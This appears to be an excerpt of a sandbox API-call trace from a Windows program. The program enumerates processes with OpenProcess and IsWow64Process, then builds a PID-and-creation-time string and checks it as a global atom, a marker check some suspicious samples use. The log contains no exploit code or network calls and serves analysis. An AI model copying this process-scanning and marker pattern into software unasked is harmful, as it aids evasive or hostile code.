	[0092.529] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.529] CloseHandle (hObject=0x20c) returned 1
	[0092.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0092.529] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.529] CloseHandle (hObject=0x20c) returned 1
	[0092.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0092.529] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.529] CloseHandle (hObject=0x20c) returned 1
	[0092.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0092.529] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.529] CloseHandle (hObject=0x20c) returned 1
	[0092.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0092.529] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.529] CloseHandle (hObject=0x20c) returned 1
	[0092.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0092.530] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.530] CloseHandle (hObject=0x20c) returned 1
	[0092.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0092.530] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.530] CloseHandle (hObject=0x20c) returned 1
	[0092.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0092.530] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.530] CloseHandle (hObject=0x20c) returned 1
	[0092.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0092.530] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.530] CloseHandle (hObject=0x20c) returned 1
	[0092.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0092.530] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.530] CloseHandle (hObject=0x20c) returned 1
	[0092.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0092.531] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.531] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0092.531] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0092.531] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0092.531] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.531] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0092.531] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.532] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0092.532] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0092.532] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0092.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0092.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0092.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0092.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0092.532] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.532] CloseHandle (hObject=0x20c) returned 1
	[0092.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0092.532] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.532] CloseHandle (hObject=0x20c) returned 1
	[0092.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0092.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0092.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0092.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0092.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0092.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0092.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0092.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0092.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0092.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0092.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0092.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0092.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0092.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0092.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0092.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0092.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0092.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0092.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0092.606] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.606] CloseHandle (hObject=0x20c) returned 1
	[0092.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0092.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0092.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0092.607] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.607] CloseHandle (hObject=0x20c) returned 1
	[0092.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0092.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0092.607] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.607] CloseHandle (hObject=0x20c) returned 1
	[0092.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0092.607] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.607] CloseHandle (hObject=0x20c) returned 1
	[0092.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0092.607] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.607] CloseHandle (hObject=0x20c) returned 1
	[0092.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0092.608] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.608] CloseHandle (hObject=0x20c) returned 1
	[0092.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0092.608] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.608] CloseHandle (hObject=0x20c) returned 1
	[0092.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0092.608] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.608] CloseHandle (hObject=0x20c) returned 1
	[0092.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0092.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0092.608] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.608] CloseHandle (hObject=0x20c) returned 1
	[0092.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0092.608] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.608] CloseHandle (hObject=0x20c) returned 1
	[0092.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0092.609] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.609] CloseHandle (hObject=0x20c) returned 1
	[0092.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0092.609] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.609] CloseHandle (hObject=0x20c) returned 1
	[0092.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0092.609] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.609] CloseHandle (hObject=0x20c) returned 1
	[0092.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0092.609] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.609] CloseHandle (hObject=0x20c) returned 1
	[0092.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0092.609] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.609] CloseHandle (hObject=0x20c) returned 1
	[0092.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0092.610] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.610] CloseHandle (hObject=0x20c) returned 1
	[0092.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0092.610] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.610] CloseHandle (hObject=0x20c) returned 1
	[0092.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0092.610] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.610] CloseHandle (hObject=0x20c) returned 1
	[0092.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0092.610] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.610] CloseHandle (hObject=0x20c) returned 1
	[0092.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0092.610] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.610] CloseHandle (hObject=0x20c) returned 1
	[0092.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0092.611] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.611] CloseHandle (hObject=0x20c) returned 1
	[0092.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0092.611] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.611] CloseHandle (hObject=0x20c) returned 1
	[0092.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0092.611] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.611] CloseHandle (hObject=0x20c) returned 1
	[0092.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0092.611] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.611] CloseHandle (hObject=0x20c) returned 1
	[0092.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0092.611] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.611] CloseHandle (hObject=0x20c) returned 1
	[0092.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0092.611] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.612] CloseHandle (hObject=0x20c) returned 1
	[0092.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0092.612] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.612] CloseHandle (hObject=0x20c) returned 1
	[0092.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0092.612] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.612] CloseHandle (hObject=0x20c) returned 1
	[0092.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0092.612] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.612] CloseHandle (hObject=0x20c) returned 1
	[0092.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0092.612] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.612] CloseHandle (hObject=0x20c) returned 1
	[0092.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0092.612] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.612] CloseHandle (hObject=0x20c) returned 1
	[0092.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0092.613] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.613] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0092.613] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0092.613] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0092.613] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.613] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0092.614] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.614] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0092.614] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0092.614] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0092.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0092.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0092.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0092.614] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.614] CloseHandle (hObject=0x20c) returned 1
	[0092.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0092.614] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.614] CloseHandle (hObject=0x20c) returned 1
	[0092.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0092.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0092.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0092.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0092.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0092.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0092.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0092.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0092.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0092.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0092.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0092.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0092.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0092.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0092.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0092.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0092.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0092.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0092.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0092.686] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.686] CloseHandle (hObject=0x20c) returned 1
	[0092.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0092.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0092.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0092.686] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.686] CloseHandle (hObject=0x20c) returned 1
	[0092.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0092.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0092.687] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.687] CloseHandle (hObject=0x20c) returned 1
	[0092.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0092.687] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.687] CloseHandle (hObject=0x20c) returned 1
	[0092.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0092.687] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.687] CloseHandle (hObject=0x20c) returned 1
	[0092.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0092.687] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.687] CloseHandle (hObject=0x20c) returned 1
	[0092.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0092.688] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.688] CloseHandle (hObject=0x20c) returned 1
	[0092.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0092.688] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.688] CloseHandle (hObject=0x20c) returned 1
	[0092.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0092.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0092.688] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.688] CloseHandle (hObject=0x20c) returned 1
	[0092.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0092.688] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.688] CloseHandle (hObject=0x20c) returned 1
	[0092.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0092.689] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.689] CloseHandle (hObject=0x20c) returned 1
	[0092.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0092.689] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.689] CloseHandle (hObject=0x20c) returned 1
	[0092.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0092.689] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.689] CloseHandle (hObject=0x20c) returned 1
	[0092.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0092.689] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.689] CloseHandle (hObject=0x20c) returned 1
	[0092.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0092.689] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.689] CloseHandle (hObject=0x20c) returned 1
	[0092.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0092.689] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.689] CloseHandle (hObject=0x20c) returned 1
	[0092.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0092.690] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.690] CloseHandle (hObject=0x20c) returned 1
	[0092.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0092.690] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.690] CloseHandle (hObject=0x20c) returned 1
	[0092.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0092.690] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.690] CloseHandle (hObject=0x20c) returned 1
	[0092.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0092.690] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.690] CloseHandle (hObject=0x20c) returned 1
	[0092.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0092.690] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.690] CloseHandle (hObject=0x20c) returned 1
	[0092.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0092.690] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.691] CloseHandle (hObject=0x20c) returned 1
	[0092.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0092.691] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.691] CloseHandle (hObject=0x20c) returned 1
	[0092.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0092.691] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.691] CloseHandle (hObject=0x20c) returned 1
	[0092.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0092.691] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.691] CloseHandle (hObject=0x20c) returned 1
	[0092.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0092.691] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.691] CloseHandle (hObject=0x20c) returned 1
	[0092.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0092.691] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.691] CloseHandle (hObject=0x20c) returned 1
	[0092.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0092.692] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.692] CloseHandle (hObject=0x20c) returned 1
	[0092.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
